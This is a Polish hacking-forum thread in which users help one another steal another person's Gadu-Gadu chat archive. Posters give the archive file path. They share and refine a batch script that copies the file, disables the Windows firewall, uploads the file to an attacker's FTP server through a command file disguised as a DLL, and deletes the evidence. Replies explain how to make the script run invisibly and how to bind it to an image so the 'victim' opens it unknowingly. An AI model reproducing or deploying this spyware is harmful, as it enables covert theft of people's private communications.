Proszę o pomoc "GG"

Zajaczek

Użytkownik
Dołączył
Styczeń 6, 2012
Posty
3
Witam ;) miałbym do was malutką prośbę...
A więc tak, znam hasło do konta GG pewnej osoby i miałbym pytanie czy mogę jakoś zdobyć tej osoby archiwum jeśli się da to w jaki sposób?
Z góry dziękuje z pomoc !!:) czekam na odpowiedź
 

VR8

Moderator
Członek Załogi
Dołączył
Wrzesień 24, 2011
Posty
325
Musiałbyś ukraść z jego kompa plik "archive.dat"
 

Zajaczek

Użytkownik
Dołączył
Styczeń 6, 2012
Posty
3
a mógłbyś mi powiedzieć w jaki sposób mógłbym to zrobić ??

Dobra to zapytam inaczej ;D...
czy jak dodam tej osoby profil u siebie na kompie, i ta osoba będzie teraz pisała czy będę mógł sprawdzić te rozmowy ?? czy będą się też u mnie zapisywały ??
 
Ostatnio edytowane przez moderatora:

VR8

Moderator
Członek Załogi
Dołączył
Wrzesień 24, 2011
Posty
325
Dobra to zapytam inaczej ;D...
czy jak dodam tej osoby profil u siebie na kompie, i ta osoba będzie teraz pisała czy będę mógł sprawdzić te rozmowy ?? czy będą się też u mnie zapisywały ??
Nie. To tak jakby twój kolega stworzył na pulpicie plik password.txt. Ty stworzył byś taki sam, i liczył na to że jak on napisze w nim swoje hasło to u ciebie też będzie.
 

michal31337

Były Moderator
Dołączył
Październik 16, 2011
Posty
329
a mógłbyś mi powiedzieć w jaki sposób mógłbym to zrobić ??

Dobra to zapytam inaczej ;D...
czy jak dodam tej osoby profil u siebie na kompie, i ta osoba będzie teraz pisała czy będę mógł sprawdzić te rozmowy ?? czy będą się też u mnie zapisywały ??
Da się jeżeli:
1. Zdobędziesz hasło do Gadu gadu (to chyba już masz zrobione)
2. Uruchomisz w screenie EKG2 na Shellu logując się na ten numer
Czyli na twoje możliwości to raczej VR8 ma rację - Nie. Nie da się :(
Archiwum możesz zdobyć, wystarczy że skopiujesz plik od niego z komputera Archive.db z "C:\Users\user\AppData\Roaming\Gadu-Gadu 10\numer_gg\Archive.db" (W7) i potem otworzysz u siebie na komputerze.
Możesz plik skopiować ręcznie, albo programikiem, który mu wyślesz i wykona to zadanie.
 
Ostatnia edycja:

bi-tek

Użytkownik
Dołączył
Luty 14, 2008
Posty
26
Piszesz prosty skrypt. Skrypt zawiera informacje co ma zrobić - w tym przypadku skopiować plik potem podajesz mu ścieszkę pliku następnie komende żeby Ci go przesłał. Proste nieprawdaż ?
 

majsterkowic

Użytkownik
Dołączył
Styczeń 4, 2012
Posty
3
Dołączam się do tematu.Mógłbym mi ktoś napisać skrypt który umożliwi kradzież archiwum?Mogę go nagrać na pendrive'a i dać ofiarze, ale wolałbym żeby był zdalny.Z góry dziękuje.
 

PanFader

Użytkownik
Dołączył
Luty 27, 2011
Posty
60
Podam skrypt BATCH.
Zrobiłem wcześniej temat z wirusem który wysyła ten plik na konto FTP , ale skoro nie widziałeś , to napiszę go tutaj.
Lepiej go później skonwertować na .EXE i dodać mu funkcję INVISIBLE (nie pamiętam czy to tak) , aby nie było widać okienka programu. Nie wiem czy dobry ten skrypt , jakby był zły to proszę mnie poprawić. Testowałem u siebie , to działał.

@echo off
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
echo quit >> "%windir%\system32\sysfiles32.dll"
netsh firewall set opmode disable
ftp -s:"%windir%\system32\sysfiles32.dll"
cls
netsh firewall set opmode enable
del "C:\windows\system32\Archive.db"
del "C:\windows\system32\sysfiles32.dll"
 
Ostatnia edycja:

bi-tek

Użytkownik
Dołączył
Luty 14, 2008
Posty
26
W skrypcie można było by poprawić żeby wszystkie ścieżki były uniwersalne (2 brakowało)
Kod:
@echo off

copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo send " %WINDIR%\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
echo quit >> "%windir%\system32\sysfiles32.dll"
netsh firewall set opmode disable
ftp -s:"%windir%\system32\sysfiles32.dll"
cls
netsh firewall set opmode enable
del " %WINDIR%\system32\Archive.db"
del " %WINDIR%\system32\sysfiles32.dll" 

exit


Skrypt działa na wszystkich windowsach. Są programy do konwersjii .bat do exe i tam się da zaznaczyć czy okno ma być pokazywane czy nie.
 
Ostatnia edycja:

harbinger

Użytkownik
Dołączył
Styczeń 10, 2012
Posty
91
jak na mój gust to masz niepotrzebne nawiasy ostre '<' i '>' przy numerze GG w ścieżce do pliku z Archirum.. usuń je, zostaw w ścieżce sam numer i powinno banglać..

ale ja się w sumie nie znam ;)
 

PanFader

Użytkownik
Dołączył
Luty 27, 2011
Posty
60
Tych nawiasów się nie piszę w programie.
Jest to tylko wyznaczone miejsce do numeru gadu gadu.
Przykład "%appdata%\Gadu-Gadu 10\12345\Archive.db"
 

street2122

Użytkownik
Dołączył
Marzec 13, 2011
Posty
6
Dzieki za odpowiedzi. Mam jeszcze jedno pytanie: Czy ten plik wsadowy da sie ukryc w jakims obrazku zeby "ofiara" nie miala podejrzen? Jesli tak, proszę o sugestie ;)
 

PanFader

Użytkownik
Dołączył
Luty 27, 2011
Posty
60
W jakim obrazku?
Nie bardzo rozumiem.
Chcesz aby nie okienko programu nie było widoczne?
Jeśli tak to użyj konwertera na .EXE , i wybierz opcję INVISIBLE (okienko programu będzie nie widoczne , czyli po uruchomieniu
programu , nic się nie pojawi , ale operacja będzie przebiegała normalnie).
Po skonwertowaniu na .EXE , nie będzie można od tak sobie odczytać skrypt BATCH.
Polecam Ci ten konwerter.

http://www.brothersoft.com/bat-to-exe-converter-50301.html
 

street2122

Użytkownik
Dołączył
Marzec 13, 2011
Posty
6
Nie chodzilo o konwert, ale i tak korzystalem wczesniej z programu ktory wczesniej umiesciles za co dziekuje.
Chodzi o to, ze mam ten plik exe(skonwertowany .bat) i chce go połączyć np. ze zdjęciem, żeby tworzyły jeden plik i jak ofiara otwiera zdjecie to od razu uruchamia się ten skrypt.
 

dodoxx6

Były Moderator
Dołączył
Luty 15, 2011
Posty
252
Mówisz tutaj o binderze. Zrobi on to o czym mówisz tylko w części, rozszerzenie ".exe" pozostanie, ale zdjęcie się włączy (ikonka itd. też się zmienią).
Większość userów nie ma włączonego wyświetlania rozszerzeń, więc zapewne to przegapi. Dobrze by było jakbyś się zorientował z kim masz do czynienia.
 
Ostatnia edycja:

PanFader

Użytkownik
Dołączył
Luty 27, 2011
Posty
60
A i jeszcze jedno.
Street2122 , testowałeś ten program BATCH u siebie?
Bo u mnie nie działa ten "Archive.db" , po pobraniu z konta FTP. Gdy otwieram go specjalnym programem , jest taki komunikat :

archiveo.png

Przy wysyłaniu na konto FTP , dokonuje się tam jakieś uszkodzenie pliku , czy co?
Za każdym razem się tak robi.
Próbowałem też spakować w archiwum .rar , a następnie zaszyfrować hasłem , lecz wtedy przy wypakowywaniu
piszę że archiwum jest uszkodzone... :/
Testowałem też u innej osoby , to też taki komunikat wyskakuje.
Da się temu jakoś zaradzić?
Z góry thx.
 
Ostatnia edycja:

street2122

Użytkownik
Dołączył
Marzec 13, 2011
Posty
6
batch testowałem u siebie, ale nie probowalem odczytywac. Jakim programem probujesz odczytac archiwum?
 
Do góry Bottom